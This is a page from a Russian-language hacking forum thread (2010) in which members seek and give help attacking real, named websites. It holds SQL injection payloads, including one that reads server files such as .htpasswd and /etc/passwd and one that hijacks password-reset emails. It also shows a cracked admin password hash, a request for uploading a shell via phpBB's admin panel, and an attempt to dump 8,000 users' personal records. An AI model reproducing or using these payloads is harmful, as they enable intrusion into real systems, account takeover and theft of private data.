ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1249 из 1393 « Первая < 249749114911991239 1245 1246 1247 1248 1249 1250 1251 1252 1253 125912991349 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #12481  
Старый 10.04.2010, 00:34
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию
Цитата:
Сообщение от Darren  
http://www.nzp.co.nz/company.php?pg=79/**/order/**/by/**/4/*

помогите раскрутить скуль
Как я понял выводится только через ошибку
Код:
http://www.nzp.co.nz/company.php?pg=79+and+substring(version(),1,1)=3
Третья ветка MySQL, про особенности проведения инъекций здеcь можно подробнее прочитать например тут: https://forum.antichat.ru/showpost.php?p=565034&postcount=4
__________________
Feci, quod potui. Faciant meliora potentes.
 
Ответить с цитированием

  #12482  
Старый 10.04.2010, 17:06
DrakonHaSh
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305

Репутация: 30
Отправить сообщение для DrakonHaSh с помощью ICQ
По умолчанию
[hide=1]
наткнулся на непонятку:
на сайте есть админка - site/admin/
через sql inj с load_file вытянул [user()=root@localhost]

admin/.htaccess
=>
AuthType Basic
AuthName "bla bla"
AuthUserFile /Users/serveradmin/Documents/.htpasswd
Require user serveradmin

файл /Users/serveradmin/Documents/.htpasswd через sql inj не тянется, вполне возможно его и нет.
есть файл
admin/.htpasswd
=>
admin:t0oQM1tD4/ytw [=> nh84mk]
jamie:OWkrWXnR/Sr46

но через admin/nh84mk авторизация не проходит.
вопрос 1 - там соль (вроде соль же в .htpasswd не используется ?)
или у меня не хватает прав прочесть /Users/serveradmin/Documents/.htpasswd ?
или что-то еще ?

доп инфа:

/etc/passwd
=>
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_www:*:70:70:World Wide Web Server:/Library/WebServer:/usr/bin/false
_mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false
...

есть pureftpd.pdb, но как оттуда вытянуть пароли я не нашел

вопрос 2: если включено экранирование кавычек то into outfile или его вариантом воспользоваться нельзя ?

сайтом могу за помощь поделиться - я на нем просто тренируюсь там ничего интересного нет, кроме самой возможности заиметь дедик
[/hide]
 
Ответить с цитированием

  #12483  
Старый 10.04.2010, 17:34
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию
Цитата:
вопрос 1 - там соль (вроде соль же в .htpasswd не используется ?)
Нету там никакой соли. просто авторизация проходит по /Users/serveradmin/Documents/.htpasswd(на который нет прав для чтения мускулу), а не по admin/.htpasswd
Цитата:
вопрос 2: если включено экранирование кавычек то into outfile или его вариантом воспользоваться нельзя ?
Если скуль двойная(что это?) - то можно, в обычном случае нельзя.
Последний раз редактировалось Iceangel_; 10.04.2010 в 17:48..
 
Ответить с цитированием

  #12484  
Старый 10.04.2010, 18:18
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию
Цитата:
Нету там никакой соли
Первые два символа DES-хэша и есть соль.
PHP код:
<?php
  echo crypt ('nh84mk''t0'), "\n";
?>
Код:
t0oQM1tD4/ytw
Интересно, сколько этот пост проживет? )
 
Ответить с цитированием

  #12485  
Старый 10.04.2010, 19:15
Deani
Познающий
Регистрация: 09.11.2009
Сообщений: 32
Провел на форуме:
79679

Репутация: 3
По умолчанию
Ребята, нашел sql inj на сайте и ничего с ней не получается.
Вот сайт http://www.warsong.ws/exchange/?s=send
 
Ответить с цитированием

  #12486  
Старый 10.04.2010, 19:36
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
Код:
' AND NULL UNION SELECT 'email@mail.com',1#
Где 1 - id юзера, email@mail.com - твой мейл.

На него придет ссылка с подтверждением смены пароля для указаного id.
 
Ответить с цитированием

  #12487  
Старый 11.04.2010, 00:06
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию
phpBB 2.0.21 как залить шел с админки??
 
Ответить с цитированием

  #12488  
Старый 11.04.2010, 00:29
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию
кидай в личку, подмогу чем смогу
 
Ответить с цитированием

  #12489  
Старый 11.04.2010, 01:49
Darren
Banned
Регистрация: 14.06.2008
Сообщений: 34
Провел на форуме:
119183

Репутация: 13
Отправить сообщение для Darren с помощью ICQ
По умолчанию
Такие вопросы
1)
Могу ли я сделать два условия сразу т.е.:

union%20select%20concat(M_uname,0x3a,M_dob,0x3a,M_ lastlog,)%20from%20members%20where%20M_country='US A' and M_gender='M' limit+0,1%20--

т.е. мне нужны только мужики и америкосы. Правельно ли я реализовал запрос? Если нет то как можно реализовать такую задачу

2)
При таком запросе без лимита выводится первый в списке, а мне нужно слить 8000 акков что при таком раскладе будет слегка затруднительно)

union%20select%20concat(M_uname,0x3a,M_dob,0x3a,M_ lastlog,)%20from%20members%20where%20M_country='US A' and M_gender='M'

Пробывал делать так (выводится ошибка о не верном типе данных) :
union%20select%20group_concat(M_uname,0x3a,M_dob,0 x3a,M_lastlog,)%20from%20members%20where%20M_count ry='USA' and M_gender='M'

(Ногами не пинать. Новичок.)
 
Ответить с цитированием

  #12490  
Старый 11.04.2010, 02:10
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию
Цитата:
Сообщение от Darren  
Такие вопросы
1)
Могу ли я сделать два условия сразу т.е.:

union%20select%20concat(M_uname,0x3a,M_dob,0x3a,M_ lastlog,)%20from%20members%20where%20M_country='US A' and M_gender='M' limit+0,1%20--

т.е. мне нужны только мужики и америкосы. Правельно ли я реализовал запрос? Если нет то как можно реализовать такую задачу

2)
При таком запросе без лимита выводится первый в списке, а мне нужно слить 8000 акков что при таком раскладе будет слегка затруднительно)

union%20select%20concat(M_uname,0x3a,M_dob,0x3a,M_ lastlog,)%20from%20members%20where%20M_country='US A' and M_gender='M'

Пробывал делать так (выводится ошибка о не верном типе данных) :
union%20select%20group_concat(M_uname,0x3a,M_dob,0 x3a,M_lastlog,)%20from%20members%20where%20M_count ry='USA' and M_gender='M'

(Ногами не пинать. Новичок.)
Подучи хоть немного синтаксис sql и подобные вопросы отпадут
 
Ответить с цитированием
Ответ
Страница 1249 из 1393 « Первая < 249749114911991239 1245 1246 1247 1248 1249 1250 1251 1252 1253 125912991349 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ